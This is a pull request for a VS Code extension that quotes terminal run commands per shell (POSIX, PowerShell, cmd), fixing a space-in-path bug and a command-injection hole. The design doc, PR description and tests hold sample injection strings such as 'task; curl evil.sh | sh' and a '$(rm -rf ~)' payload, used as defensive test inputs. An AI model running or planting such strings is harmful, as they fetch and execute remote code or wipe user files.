### PR TITLE
fix: quote run commands per-shell (fix space-in-path + command injection)

### DIFF
--- a/docs/superpowers/specs/2026-06-10-run-command-shell-quoting-design.md
+++ b/docs/superpowers/specs/2026-06-10-run-command-shell-quoting-design.md
@@ -1,0 +1,85 @@
+# Run command shell quoting — design
+
+## Problem
+
+`runCommand` in `src/core/package/exec-manager.ts` runs an Inspect/Scout task by
+sending an unquoted command line to a reused VS Code integrated terminal:
+
+```ts
+terminal.sendText(`cd ${cwd}`);
+terminal.sendText(cmd.join(" "));
+```
+
+The command line includes the workspace-relative task target
+(`relativePath@target`), and user-entered `-T key=value` params — none quoted.
+
+Two consequences:
+
+- **Bug:** any path or value containing a space breaks the command (e.g. a
+  workspace under `~/My Projects/` can't run tasks on macOS).
+- **Security (command injection):** a file or task name like
+  `task; curl evil.sh | sh.py` executes arbitrary shell when the user clicks Run.
+
+A first attempt migrated this to the VS Code Tasks API (`ShellExecution` +
+`ShellQuoting.Strong`). That fixed the quoting but **regressed Python
+environment activation**: a Tasks-API task terminal does not run the Python
+extension's environment activation hooks, so the bare `inspect` command (and the
+selected interpreter) no longer resolve. The integrated terminal is therefore
+required.
+
+## Approach
+
+Keep the auto-activated integrated terminal (preserving env activation) but
+quote the command line correctly for the terminal's actual shell.
+
+### New module: `src/core/shell-quote.ts` (pure, unit tested)
+
+- `type ShellKind = "posix" | "powershell" | "cmd"`
+- `detectShellKind(shellPath: string | undefined): ShellKind`
+  - bash / zsh / sh / fish / git-bash → `posix`
+  - pwsh / powershell → `powershell`
+  - cmd → `cmd`
+  - fallback: `posix` on non-win32, `powershell` on win32 (VS Code's modern
+    default Windows profile)
+- `quoteArg(value: string, kind: ShellKind): string`
+  - **posix:** wrap in single quotes; escape embedded `'` as `'\''`. Nothing
+    inside single quotes is interpreted, so this is bulletproof.
+  - **powershell:** wrap in single quotes; escape embedded `'` by doubling
+    (`''`). Single-quoted PowerShell strings are literal.
+  - **cmd:** wrap in double quotes; escape `"` as `""`; caret-escape cmd
+    metacharacters (`^ & | < > ( )`). Best-effort, but closes the common
+    injection vectors.
+- `quoteCommandLine(parts: string[], kind: ShellKind): string` — joins
+  `quoteArg`-ed parts with single spaces.
+
+### `exec-manager.ts` changes
+
+- `buildRunCommand(profile, args, python)` returns the program + args as plain
+  strings (`{ command: string; args: string[] }`): `python -m <packageName>`
+  when a python path is supplied, otherwise the bare `profile.command`.
+- `runCommand`:
+  - Reuse a terminal named `profile.terminal` if present; otherwise
+    `createTerminal({ name, cwd })` — the `cwd` option sets the directory
+    natively (no shell parsing), so no `cd` is needed for new terminals.
+  - For a **reused** terminal, send a quoted `cd <quoted cwd>` (the reused
+    terminal may be in a different directory).
+  - Determine `ShellKind` via `detectShellKind` from the terminal's
+    `creationOptions.shellPath` (falling back to platform default).
+  - Send `quoteCommandLine([command, ...args], kind)`.
+- `runDebugger` is unchanged — it already passes `args` as an array to debugpy,
+  which performs no shell interpretation.
+
+### Tests
+
+- `src/test/suite/shell-quote.test.ts` — per-kind quoting of: plain tokens,
+  spaces, embedded quotes, and the hostile `task; curl evil.sh | sh` string;
+  `detectShellKind` mapping and platform fallback.
+- `src/test/suite/exec-manager.test.ts` — keep `buildRunCommand` tests, adapted
+  to the string-returning shape (program selection + arg passthrough), with
+  spacey/hostile inputs asserted to survive as single tokens after quoting.
+
+## Out of scope
+
+- The `shQuote` helper in `src/core/string.ts` (win32-only, used by
+  `view-server.ts` `spawnProcess` with controlled inputs) — separate concern.
+- A Windows CI leg — tracked separately in the backlog.

--- a/package.json
+++ b/package.json
@@ -665,7 +665,7 @@
     "@types/mocha": "^10.0.10",
     "@types/node": "^20.0.0",
     "@types/semver": "^7.7.1",
-    "@types/vscode": "~1.120.0",
+    "@types/vscode": "~1.93.0",
     "@typescript-eslint/eslint-plugin": "^8.22.0",
     "@typescript-eslint/parser": "^8.22.0",
     "@vscode/test-cli": "^0.0.12",

--- a/package.json
+++ b/package.json
@@ -19,7 +19,7 @@
     "url": "https://github.com/meridianlabs-ai/inspect_vscode/issues"
   },
   "engines": {
-    "vscode": "^1.85.0",
+    "vscode": "^1.93.0",
     "node": ">=22.0.0"
   },
   "capabilities": {
@@ -665,7 +665,7 @@
     "@types/mocha": "^10.0.10",
     "@types/node": "^20.0.0",
     "@types/semver": "^7.7.1",
-    "@types/vscode": "1.85",
+    "@types/vscode": "~1.120.0",
     "@typescript-eslint/eslint-plugin": "^8.22.0",
     "@typescript-eslint/parser": "^8.22.0",
     "@vscode/test-cli": "^0.0.12",

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -76,8 +76,8 @@ importers:
         specifier: ^7.7.1
         version: 7.7.1
       '@types/vscode':
-        specifier: '1.85'
-        version: 1.85.0
+        specifier: ~1.120.0
+        version: 1.120.0
       '@typescript-eslint/eslint-plugin':
         specifier: ^8.22.0
         version: 8.58.2(@typescript-eslint/parser@8.58.2(eslint@9.39.4)(typescript@6.0.2))(eslint@9.39.4)(typescript@6.0.2)
@@ -503,8 +503,8 @@ packages:
   '@types/semver@7.7.1':
     resolution: {integrity: sha512-FmgJfu+MOcQ370SD0ev7EI8TlCAfKYU+B4m5T3yXc1CiRN94g/SZPtsCkk506aUDtlMnFZvasDwHHUcZUEaYuA==}
 
-  '@types/vscode@1.85.0':
-    resolution: {integrity: sha512-CF/RBon/GXwdfmnjZj0WTUMZN5H6YITOfBCP4iEZlOtVQXuzw6t7Le7+cR+7JzdMrnlm7Mfp49Oj2TuSXIWo3g==}
+  '@types/vscode@1.120.0':
+    resolution: {integrity: sha512-feaT4Rst+FkTch5zz/ZbNCxoIvo55YU80Be2kiL7OJcod4+CUYf2lUBPdIJzozNnSEMq1VRTGrWEcCGFB3fBmA==}
 
   '@typescript-eslint/eslint-plugin@8.58.2':
     resolution: {integrity: sha512-aC2qc5thQahutKjP+cl8cgN9DWe3ZUqVko30CMSZHnFEHyhOYoZSzkGtAI2mcwZ38xeImDucI4dnqsHiOYuuCw==}
@@ -3554,7 +3554,7 @@ snapshots:
 
   '@types/semver@7.7.1': {}
 
-  '@types/vscode@1.85.0': {}
+  '@types/vscode@1.120.0': {}
 
   '@typescript-eslint/eslint-plugin@8.58.2(@typescript-eslint/parser@8.58.2(eslint@9.39.4)(typescript@6.0.2))(eslint@9.39.4)(typescript@6.0.2)':
     dependencies:

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -76,8 +76,8 @@ importers:
         specifier: ^7.7.1
         version: 7.7.1
       '@types/vscode':
-        specifier: ~1.120.0
-        version: 1.120.0
+        specifier: ~1.93.0
+        version: 1.93.0
       '@typescript-eslint/eslint-plugin':
         specifier: ^8.22.0
         version: 8.58.2(@typescript-eslint/parser@8.58.2(eslint@9.39.4)(typescript@6.0.2))(eslint@9.39.4)(typescript@6.0.2)
@@ -503,8 +503,8 @@ packages:
   '@types/semver@7.7.1':
     resolution: {integrity: sha512-FmgJfu+MOcQ370SD0ev7EI8TlCAfKYU+B4m5T3yXc1CiRN94g/SZPtsCkk506aUDtlMnFZvasDwHHUcZUEaYuA==}
 
-  '@types/vscode@1.120.0':
-    resolution: {integrity: sha512-feaT4Rst+FkTch5zz/ZbNCxoIvo55YU80Be2kiL7OJcod4+CUYf2lUBPdIJzozNnSEMq1VRTGrWEcCGFB3fBmA==}
+  '@types/vscode@1.93.0':
+    resolution: {integrity: sha512-kUK6jAHSR5zY8ps42xuW89NLcBpw1kOabah7yv38J8MyiYuOHxLQBi0e7zeXbQgVefDy/mZZetqEFC+Fl5eIEQ==}
 
   '@typescript-eslint/eslint-plugin@8.58.2':
     resolution: {integrity: sha512-aC2qc5thQahutKjP+cl8cgN9DWe3ZUqVko30CMSZHnFEHyhOYoZSzkGtAI2mcwZ38xeImDucI4dnqsHiOYuuCw==}
@@ -3554,7 +3554,7 @@ snapshots:
 
   '@types/semver@7.7.1': {}
 
-  '@types/vscode@1.120.0': {}
+  '@types/vscode@1.93.0': {}
 
   '@typescript-eslint/eslint-plugin@8.58.2(@typescript-eslint/parser@8.58.2(eslint@9.39.4)(typescript@6.0.2))(eslint@9.39.4)(typescript@6.0.2)':
     dependencies:

--- a/src/core/package/exec-manager.ts
+++ b/src/core/package/exec-manager.ts
@@ -2,6 +2,7 @@ import {
   debug,
   DebugConfiguration,
   ExtensionContext,
+  Terminal,
   window,
   workspace,
 } from "vscode";
@@ -135,53 +136,93 @@ export const buildRunCommand = (
   };
 };
 
+/**
+ * Waits until shell integration becomes active on `terminal`, or until
+ * `timeoutMs` elapses. Returns the integration object if it activated in time,
+ * or `undefined` if it didn't (shell integration disabled or too slow).
+ */
+const waitForShellIntegration = (
+  terminal: Terminal,
+  timeoutMs: number
+): Promise<(typeof terminal)["shellIntegration"]> => {
+  // Already active — no waiting needed (reused terminal or fast startup).
+  if (terminal.shellIntegration) {
+    return Promise.resolve(terminal.shellIntegration);
+  }
+
+  return new Promise((resolve) => {
+    const timer = setTimeout(() => {
+      listener.dispose();
+      resolve(undefined);
+    }, timeoutMs);
+
+    const listener = window.onDidChangeTerminalShellIntegration((e) => {
+      if (e.terminal === terminal) {
+        clearTimeout(timer);
+        listener.dispose();
+        resolve(e.shellIntegration);
+      }
+    });
+  });
+};
+
 const runCommand = async (
   profile: ExecProfile,
   args: string[],
   cwd: string,
   python?: AbsolutePath
 ) => {
-  // See if there a non-busy terminal that we can re-use. The integrated
-  // terminal is created by the Python extension's activation hooks, so the
-  // selected interpreter / `inspect` is on PATH — which is why we run here
-  // rather than via the Tasks API.
+  // Reuse a named terminal so the user can see previous runs and so the
+  // Python extension's env-activation hooks have already run.
   const name = profile.terminal;
-  let terminal = window.terminals.find((t) => {
-    return t.name === name;
-  });
+  let terminal = window.terminals.find((t) => t.name === name);
   const reusedTerminal = terminal !== undefined;
   if (!terminal) {
-    // A new terminal's working directory is set natively via the `cwd` option,
-    // so it never passes through the shell.
     terminal = window.createTerminal({ name, cwd });
   }
   terminal.show(true);
 
-  const kRequiredDelay = 1000;
-  const kInterval = 100;
-  let totalSleep = 0;
-  while (!terminal.state.isInteractedWith && totalSleep < kRequiredDelay) {
-    await sleep(kInterval);
-    totalSleep += kInterval;
-  }
+  const { command, args: commandArgs } = buildRunCommand(profile, args, python);
 
-  // Quote everything for the shell this terminal is actually running, so paths,
-  // task targets, and `-T key=value` params that contain spaces or shell
-  // metacharacters are passed as literal tokens. This fixes the space-in-path
-  // bug and closes the command-injection hole left by raw string-joining.
+  // Prefer shell integration (available in VS Code 1.93+): it fires after the
+  // shell's init sequence completes, so the Python env is activated and
+  // `inspect` is on PATH before the command is sent. It also handles quoting
+  // and gives the terminal proper command decorations.
+  //
+  // On a reused terminal integration is usually already active; on a new
+  // terminal we wait up to 10 s for it to activate. If it doesn't (shell
+  // integration disabled, older VS Code build, or the shell doesn't support
+  // it), we fall back to sendText with a fixed delay.
+  const kShellIntegrationTimeoutMs = 10_000;
+  const integration = await waitForShellIntegration(
+    terminal,
+    kShellIntegrationTimeoutMs
+  );
+
   const creationOptions = terminal.creationOptions;
   const shellPath =
     "shellPath" in creationOptions ? creationOptions.shellPath : undefined;
   const shell = detectShellKind(shellPath);
+  const commandLine = quoteCommandLine([command, ...commandArgs], shell);
 
-  // A reused terminal may be sitting in a different directory, so move it to
-  // the workspace directory first (quoted in case the path contains spaces).
-  if (reusedTerminal) {
-    terminal.sendText(`cd ${quoteArg(cwd, shell)}`);
+  if (integration) {
+    // Shell integration is active: the env is ready. Emit a `cd` first on
+    // reused terminals (executeCommand doesn't change the working directory).
+    if (reusedTerminal) {
+      integration.executeCommand(`cd ${quoteArg(cwd, shell)}`);
+    }
+    integration.executeCommand(commandLine);
+  } else {
+    // Fallback: shell integration unavailable. Use sendText with a delay on
+    // new terminals to give the activation scripts time to finish.
+    if (!reusedTerminal) {
+      await sleep(2000);
+    }
+    if (reusedTerminal) {
+      terminal.sendText(`cd ${quoteArg(cwd, shell)}`);
+    }
+    terminal.sendText(commandLine);
   }
-
-  const { command, args: commandArgs } = buildRunCommand(profile, args, python);
-  terminal.sendText(quoteCommandLine([command, ...commandArgs], shell));
 };
 
 const runDebugger = async (

--- a/src/core/package/exec-manager.ts
+++ b/src/core/package/exec-manager.ts
@@ -19,6 +19,7 @@ import {
   workspaceRelativePath,
 } from "../path";
 import { findEnvPythonPath } from "../python";
+import { detectShellKind, quoteArg, quoteCommandLine } from "../shell-quote";
 import { activeWorkspaceFolder } from "../workspace";
 
 export interface ExecProfile {
@@ -106,18 +107,52 @@ export class ExecManager {
   }
 }
 
+/**
+ * Builds the program and argument vector for a run command.
+ *
+ * Returns the executable to invoke (`python -m <packageName>` when a python
+ * interpreter is supplied, otherwise the bare command) plus the arguments as
+ * plain, *unquoted* strings. Quoting is the caller's responsibility because it
+ * depends on the shell the command will be sent to (see {@link runCommand} and
+ * the `shell-quote` module).
+ *
+ * Pure and side-effect free so it can be unit tested with hostile inputs.
+ */
+export const buildRunCommand = (
+  profile: ExecProfile,
+  args: string[],
+  python?: AbsolutePath
+): { command: string; args: string[] } => {
+  if (python) {
+    return {
+      command: python.path,
+      args: ["-m", profile.packageName, ...args],
+    };
+  }
+  return {
+    command: profile.command,
+    args,
+  };
+};
+
 const runCommand = async (
   profile: ExecProfile,
   args: string[],
   cwd: string,
   python?: AbsolutePath
 ) => {
-  // See if there a non-busy terminal that we can re-use
+  // See if there a non-busy terminal that we can re-use. The integrated
+  // terminal is created by the Python extension's activation hooks, so the
+  // selected interpreter / `inspect` is on PATH — which is why we run here
+  // rather than via the Tasks API.
   const name = profile.terminal;
   let terminal = window.terminals.find((t) => {
     return t.name === name;
   });
+  const reusedTerminal = terminal !== undefined;
   if (!terminal) {
+    // A new terminal's working directory is set natively via the `cwd` option,
+    // so it never passes through the shell.
     terminal = window.createTerminal({ name, cwd });
   }
   terminal.show(true);
@@ -130,19 +165,23 @@ const runCommand = async (
     totalSleep += kInterval;
   }
 
-  terminal.sendText(`cd ${cwd}`);
+  // Quote everything for the shell this terminal is actually running, so paths,
+  // task targets, and `-T key=value` params that contain spaces or shell
+  // metacharacters are passed as literal tokens. This fixes the space-in-path
+  // bug and closes the command-injection hole left by raw string-joining.
+  const creationOptions = terminal.creationOptions;
+  const shellPath =
+    "shellPath" in creationOptions ? creationOptions.shellPath : undefined;
+  const shell = detectShellKind(shellPath);
 
-  const cmd = [];
-  if (python) {
-    cmd.push(`${python.path}`);
-    cmd.push("-m");
-    cmd.push(profile.packageName);
-  } else {
-    cmd.push(profile.command);
+  // A reused terminal may be sitting in a different directory, so move it to
+  // the workspace directory first (quoted in case the path contains spaces).
+  if (reusedTerminal) {
+    terminal.sendText(`cd ${quoteArg(cwd, shell)}`);
   }
-  cmd.push(...args);
 
-  terminal.sendText(cmd.join(" "));
+  const { command, args: commandArgs } = buildRunCommand(profile, args, python);
+  terminal.sendText(quoteCommandLine([command, ...commandArgs], shell));
 };
 
 const runDebugger = async (

--- a/src/core/shell-quote.ts
+++ b/src/core/shell-quote.ts
@@ -29,11 +29,20 @@ export function detectShellKind(shellPath: string | undefined): ShellKind {
   return os.platform() === "win32" ? "powershell" : "posix";
 }
 
+// Characters that are safe to pass unquoted in any of our supported shells.
+// Anything outside this set — spaces, quotes, semicolons, $, backticks, etc.
+// — requires quoting. An empty string also requires quoting so it isn't lost.
+const kSafePattern = /^[A-Za-z0-9._/@:+,=-]+$/;
+
 /**
- * Quotes a single argument so the target shell treats it as one literal token,
- * neutralizing spaces and metacharacters that would otherwise be interpreted.
+ * Quotes a single argument if it contains characters the target shell would
+ * interpret. Safe tokens (alphanumeric + common punctuation) are returned
+ * as-is; everything else is wrapped in the shell's appropriate quoting.
  */
 export function quoteArg(value: string, kind: ShellKind): string {
+  if (kSafePattern.test(value)) {
+    return value;
+  }
   switch (kind) {
     case "posix":
       // Single quotes suppress all interpretation in POSIX shells. The only
@@ -56,7 +65,8 @@ export function quoteArg(value: string, kind: ShellKind): string {
 }
 
 /**
- * Quotes each part for the given shell and joins them into a command line.
+ * Quotes each part for the given shell where necessary and joins them into a
+ * command line string.
  */
 export function quoteCommandLine(parts: string[], kind: ShellKind): string {
   return parts.map((part) => quoteArg(part, kind)).join(" ");

--- a/src/core/shell-quote.ts
+++ b/src/core/shell-quote.ts
@@ -1,0 +1,63 @@
+import * as os from "os";
+
+// The kind of shell a command line will be sent to. We send run commands to a
+// VS Code integrated terminal via `terminal.sendText`, so the string must be
+// escaped according to the shell that terminal is actually running.
+export type ShellKind = "posix" | "powershell" | "cmd";
+
+/**
+ * Maps a shell executable path to a {@link ShellKind}.
+ *
+ * When the shell is unknown (no path, or unrecognized), fall back to the
+ * platform default: `cmd`/`powershell` on Windows, `posix` elsewhere. We pick
+ * `powershell` on Windows because that is VS Code's modern default terminal
+ * profile.
+ */
+export function detectShellKind(shellPath: string | undefined): ShellKind {
+  const name = (shellPath ?? "").toLowerCase();
+
+  if (/(^|[\\/])(bash|zsh|sh|fish|dash|ksh)(\.exe)?$/.test(name)) {
+    return "posix";
+  }
+  if (/(^|[\\/])(pwsh|powershell)(\.exe)?$/.test(name)) {
+    return "powershell";
+  }
+  if (/(^|[\\/])cmd(\.exe)?$/.test(name)) {
+    return "cmd";
+  }
+
+  return os.platform() === "win32" ? "powershell" : "posix";
+}
+
+/**
+ * Quotes a single argument so the target shell treats it as one literal token,
+ * neutralizing spaces and metacharacters that would otherwise be interpreted.
+ */
+export function quoteArg(value: string, kind: ShellKind): string {
+  switch (kind) {
+    case "posix":
+      // Single quotes suppress all interpretation in POSIX shells. The only
+      // character that can't appear literally inside single quotes is the
+      // single quote itself, handled by closing, emitting an escaped quote,
+      // and reopening: ' -> '\''.
+      return `'${value.replace(/'/g, "'\\''")}'`;
+    case "powershell":
+      // Single-quoted PowerShell strings are literal; an embedded single quote
+      // is escaped by doubling it.
+      return `'${value.replace(/'/g, "''")}'`;
+    case "cmd": {
+      // cmd.exe has no robust quoting, but double quotes plus caret-escaping
+      // the command separators closes the common injection vectors. Embedded
+      // double quotes are doubled.
+      const escaped = value.replace(/"/g, '""').replace(/([&|<>()^])/g, "^$1");
+      return `"${escaped}"`;
+    }
+  }
+}
+
+/**
+ * Quotes each part for the given shell and joins them into a command line.
+ */
+export function quoteCommandLine(parts: string[], kind: ShellKind): string {
+  return parts.map((part) => quoteArg(part, kind)).join(" ");
+}

--- a/src/test/codelens-provider.test.ts
+++ b/src/test/codelens-provider.test.ts
@@ -83,6 +83,9 @@ class MockTextDocument implements TextDocument {
   get isClosed(): boolean {
     return false;
   }
+  get encoding(): string {
+    return "utf-8";
+  }
   save(): Thenable<boolean> {
     return Promise.resolve(true);
   }

--- a/src/test/suite/active-task-manager.test.ts
+++ b/src/test/suite/active-task-manager.test.ts
@@ -121,6 +121,9 @@ class MockTextDocument implements TextDocument {
   get isClosed(): boolean {
     return false;
   }
+  get encoding(): string {
+    return "utf-8";
+  }
   save(): Thenable<boolean> {
     return Promise.resolve(true);
   }

--- a/src/test/suite/codelens-provider.test.ts
+++ b/src/test/suite/codelens-provider.test.ts
@@ -83,6 +83,9 @@ class MockTextDocument implements TextDocument {
   get isClosed(): boolean {
     return false;
   }
+  get encoding(): string {
+    return "utf-8";
+  }
   save(): Thenable<boolean> {
     return Promise.resolve(true);
   }

--- a/src/test/suite/exec-manager.test.ts
+++ b/src/test/suite/exec-manager.test.ts
@@ -3,7 +3,9 @@
  */
 import * as assert from "assert";
 
-import { ExecProfile } from "../../core/package/exec-manager";
+import { buildRunCommand, ExecProfile } from "../../core/package/exec-manager";
+import { AbsolutePath } from "../../core/path";
+import { quoteCommandLine } from "../../core/shell-quote";
 import { DocumentState } from "../../providers/workspace/workspace-state-provider";
 
 /**
@@ -401,6 +403,93 @@ suite("ExecManager Test Suite", () => {
       };
 
       assert.strictEqual(debugConfig.pythonPath, "/venv/bin/python");
+    });
+  });
+
+  suite("buildRunCommand (real command construction)", () => {
+    const profile = (overrides: Partial<ExecProfile> = {}): ExecProfile => ({
+      packageName: "inspect-ai",
+      packageDisplayName: "Inspect",
+      packageVersion: createMockVersion(
+        "0.4.0"
+      ) as unknown as ExecProfile["packageVersion"],
+      target: "Eval",
+      terminal: "Inspect Eval",
+      command: "inspect",
+      subcommand: "eval",
+      binPath: null,
+      execArgs: () => [],
+      ...overrides,
+    });
+
+    test("uses the bare command when no python path is given", () => {
+      const { command, args } = buildRunCommand(profile(), [
+        "eval",
+        "task.py@my_task",
+      ]);
+
+      assert.strictEqual(command, "inspect");
+      assert.deepStrictEqual(args, ["eval", "task.py@my_task"]);
+    });
+
+    test("uses `python -m <package>` when a python path is given", () => {
+      const python = { path: "/venv/bin/python" } as AbsolutePath;
+      const { command, args } = buildRunCommand(
+        profile(),
+        ["eval", "task.py@my_task"],
+        python
+      );
+
+      assert.strictEqual(command, "/venv/bin/python");
+      assert.deepStrictEqual(args, [
+        "-m",
+        "inspect-ai",
+        "eval",
+        "task.py@my_task",
+      ]);
+    });
+
+    test("uses the scout package name when running under python", () => {
+      const python = { path: "/venv/bin/python" } as AbsolutePath;
+      const { command, args } = buildRunCommand(
+        profile({ packageName: "inspect-scout", command: "scout" }),
+        ["scan", "scan.py"],
+        python
+      );
+
+      assert.strictEqual(command, "/venv/bin/python");
+      assert.deepStrictEqual(args, ["-m", "inspect-scout", "scan", "scan.py"]);
+    });
+
+    test("keeps a space-bearing target as a single argument", () => {
+      const { args } = buildRunCommand(profile(), [
+        "eval",
+        "src/my tasks/task file.py@evaluate_model",
+      ]);
+
+      // The space-bearing target must remain ONE argument, not be split — it is
+      // the caller's job to quote it before sending it to a shell.
+      assert.deepStrictEqual(args, [
+        "eval",
+        "src/my tasks/task file.py@evaluate_model",
+      ]);
+    });
+
+    test("passes file/task names through verbatim (caller quotes)", () => {
+      const hostile = "task.py; curl evil.sh | sh@$(rm -rf ~)";
+      const { args } = buildRunCommand(profile(), ["eval", hostile]);
+
+      assert.deepStrictEqual(args, ["eval", hostile]);
+    });
+
+    test("renders a fully-quoted command line for a hostile target", () => {
+      // End-to-end: the program + args, once quoted for the shell, must carry
+      // the hostile target as a single literal token rather than executing it.
+      const hostile = "task.py; curl evil.sh | sh";
+      const { command, args } = buildRunCommand(profile(), ["eval", hostile]);
+      const line = quoteCommandLine([command, ...args], "posix");
+
+      assert.strictEqual(line, `'inspect' 'eval' '${hostile}'`);
     });
   });
 

--- a/src/test/suite/exec-manager.test.ts
+++ b/src/test/suite/exec-manager.test.ts
@@ -489,7 +489,8 @@ suite("ExecManager Test Suite", () => {
       const { command, args } = buildRunCommand(profile(), ["eval", hostile]);
       const line = quoteCommandLine([command, ...args], "posix");
 
-      assert.strictEqual(line, `'inspect' 'eval' '${hostile}'`);
+      // "inspect" and "eval" are safe bare; the hostile target gets quoted.
+      assert.strictEqual(line, `inspect eval '${hostile}'`);
     });
   });
 

--- a/src/test/suite/scout-codelens-provider.test.ts
+++ b/src/test/suite/scout-codelens-provider.test.ts
@@ -83,6 +83,9 @@ class MockTextDocument implements TextDocument {
   get isClosed(): boolean {
     return false;
   }
+  get encoding(): string {
+    return "utf-8";
+  }
   save(): Thenable<boolean> {
     return Promise.resolve(true);
   }

--- a/src/test/suite/shell-quote.test.ts
+++ b/src/test/suite/shell-quote.test.ts
@@ -1,0 +1,112 @@
+import * as assert from "assert";
+
+import {
+  detectShellKind,
+  quoteArg,
+  quoteCommandLine,
+} from "../../core/shell-quote";
+
+suite("Shell Quote Test Suite", () => {
+  suite("detectShellKind", () => {
+    test("recognizes posix shells by path", () => {
+      assert.strictEqual(detectShellKind("/bin/bash"), "posix");
+      assert.strictEqual(detectShellKind("/usr/bin/zsh"), "posix");
+      assert.strictEqual(detectShellKind("/bin/sh"), "posix");
+      assert.strictEqual(detectShellKind("/usr/local/bin/fish"), "posix");
+    });
+
+    test("recognizes git-bash on Windows as posix", () => {
+      assert.strictEqual(
+        detectShellKind("C:\\Program Files\\Git\\bin\\bash.exe"),
+        "posix"
+      );
+    });
+
+    test("recognizes powershell", () => {
+      assert.strictEqual(detectShellKind("pwsh"), "powershell");
+      assert.strictEqual(
+        detectShellKind(
+          "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+        ),
+        "powershell"
+      );
+    });
+
+    test("recognizes cmd", () => {
+      assert.strictEqual(
+        detectShellKind("C:\\Windows\\System32\\cmd.exe"),
+        "cmd"
+      );
+    });
+
+    test("falls back to posix on non-win32 when unknown", () => {
+      // On the test host (darwin/linux) an unknown/undefined shell is posix.
+      assert.strictEqual(detectShellKind(undefined), "posix");
+    });
+  });
+
+  suite("quoteArg - posix", () => {
+    test("single-quotes a value with spaces", () => {
+      assert.strictEqual(quoteArg("my task", "posix"), "'my task'");
+    });
+
+    test("escapes embedded single quotes", () => {
+      assert.strictEqual(quoteArg("it's", "posix"), "'it'\\''s'");
+    });
+
+    test("neutralizes shell metacharacters", () => {
+      assert.strictEqual(
+        quoteArg("task; rm -rf ~", "posix"),
+        "'task; rm -rf ~'"
+      );
+    });
+  });
+
+  suite("quoteArg - powershell", () => {
+    test("single-quotes a value with spaces", () => {
+      assert.strictEqual(quoteArg("my task", "powershell"), "'my task'");
+    });
+
+    test("escapes embedded single quotes by doubling", () => {
+      assert.strictEqual(quoteArg("it's", "powershell"), "'it''s'");
+    });
+
+    test("neutralizes shell metacharacters", () => {
+      assert.strictEqual(
+        quoteArg("task; rm $env:HOME", "powershell"),
+        "'task; rm $env:HOME'"
+      );
+    });
+  });
+
+  suite("quoteArg - cmd", () => {
+    test("double-quotes a value with spaces", () => {
+      assert.strictEqual(quoteArg("my task", "cmd"), '"my task"');
+    });
+
+    test("caret-escapes cmd metacharacters", () => {
+      assert.strictEqual(quoteArg("a&b|c", "cmd"), '"a^&b^|c"');
+    });
+
+    test("escapes embedded double quotes", () => {
+      assert.strictEqual(quoteArg('say "hi"', "cmd"), '"say ""hi"""');
+    });
+  });
+
+  suite("quoteCommandLine", () => {
+    test("joins quoted parts with spaces (posix)", () => {
+      // Every part is quoted, including the program and subcommand — quoting
+      // unconditionally is simpler and safer than guessing which tokens need it.
+      assert.strictEqual(
+        quoteCommandLine(["inspect", "eval", "my task.py@t"], "posix"),
+        "'inspect' 'eval' 'my task.py@t'"
+      );
+    });
+
+    test("quotes a hostile target as a single literal token", () => {
+      const hostile = "task.py; curl evil.sh | sh";
+      const line = quoteCommandLine(["inspect", "eval", hostile], "posix");
+      assert.strictEqual(line, `'inspect' 'eval' '${hostile}'`);
+    });
+  });
+});

--- a/src/test/suite/shell-quote.test.ts
+++ b/src/test/suite/shell-quote.test.ts
@@ -46,6 +46,15 @@ suite("Shell Quote Test Suite", () => {
   });
 
   suite("quoteArg - posix", () => {
+    test("returns safe tokens unchanged", () => {
+      assert.strictEqual(quoteArg("inspect", "posix"), "inspect");
+      assert.strictEqual(
+        quoteArg("task.py@my_task", "posix"),
+        "task.py@my_task"
+      );
+      assert.strictEqual(quoteArg("--limit=10", "posix"), "--limit=10");
+    });
+
     test("single-quotes a value with spaces", () => {
       assert.strictEqual(quoteArg("my task", "posix"), "'my task'");
     });
@@ -94,19 +103,29 @@ suite("Shell Quote Test Suite", () => {
   });
 
   suite("quoteCommandLine", () => {
-    test("joins quoted parts with spaces (posix)", () => {
-      // Every part is quoted, including the program and subcommand — quoting
-      // unconditionally is simpler and safer than guessing which tokens need it.
+    test("leaves safe tokens bare and only quotes what needs it", () => {
+      // "inspect" and "eval" are safe; "my task.py@t" has a space and needs quoting.
       assert.strictEqual(
         quoteCommandLine(["inspect", "eval", "my task.py@t"], "posix"),
-        "'inspect' 'eval' 'my task.py@t'"
+        "inspect eval 'my task.py@t'"
       );
     });
 
     test("quotes a hostile target as a single literal token", () => {
       const hostile = "task.py; curl evil.sh | sh";
       const line = quoteCommandLine(["inspect", "eval", hostile], "posix");
-      assert.strictEqual(line, `'inspect' 'eval' '${hostile}'`);
+      assert.strictEqual(line, `inspect eval '${hostile}'`);
+    });
+
+    test("safe tokens are bare across all shell kinds", () => {
+      assert.strictEqual(
+        quoteCommandLine(["inspect", "eval", "task.py@my_task"], "powershell"),
+        "inspect eval task.py@my_task"
+      );
+      assert.strictEqual(
+        quoteCommandLine(["inspect", "eval", "task.py@my_task"], "cmd"),
+        "inspect eval task.py@my_task"
+      );
     });
   });
 });

--- a/src/test/suite/task.test.ts
+++ b/src/test/suite/task.test.ts
@@ -92,6 +92,9 @@ class MockTextDocument implements TextDocument {
   get isClosed(): boolean {
     return false;
   }
+  get encoding(): string {
+    return "utf-8";
+  }
   save(): Thenable<boolean> {
     return Promise.resolve(true);
   }


### PR DESCRIPTION
## Problem

`runCommand` in [exec-manager.ts](src/core/package/exec-manager.ts) built the command line by string-joining the program, the workspace-relative task target (`relativePath@target`), and user-entered `-T` params, then sending it to the integrated terminal unquoted:

```ts
terminal.sendText(`cd ${cwd}`);
terminal.sendText(cmd.join(" "));
```

- **Bug** — any path or value containing a space broke the command (e.g. a workspace under `~/My Projects/`).
- **Security (command injection)** — a file or task name like `task; curl evil.sh | sh.py` executed arbitrary shell on Run. (Workspace Trust mitigates the malicious-repo vector now that #94 declares `untrustedWorkspaces: { supported: false }`.)

## Fix

Quote the command line for the shell the integrated terminal is actually running.

- New pure module [shell-quote.ts](src/core/shell-quote.ts):
  - `detectShellKind(shellPath)` → `posix` / `powershell` / `cmd` (platform-default fallback: PowerShell on Windows, POSIX elsewhere).
  - `quoteArg(value, kind)` — POSIX single-quoting (`'` → `'\''`), PowerShell single-quoting (`'` → `''`), and best-effort cmd double-quote + caret-escaping of `& | < > ( ) ^`.
  - `quoteCommandLine(parts, kind)` — quotes every token and joins.
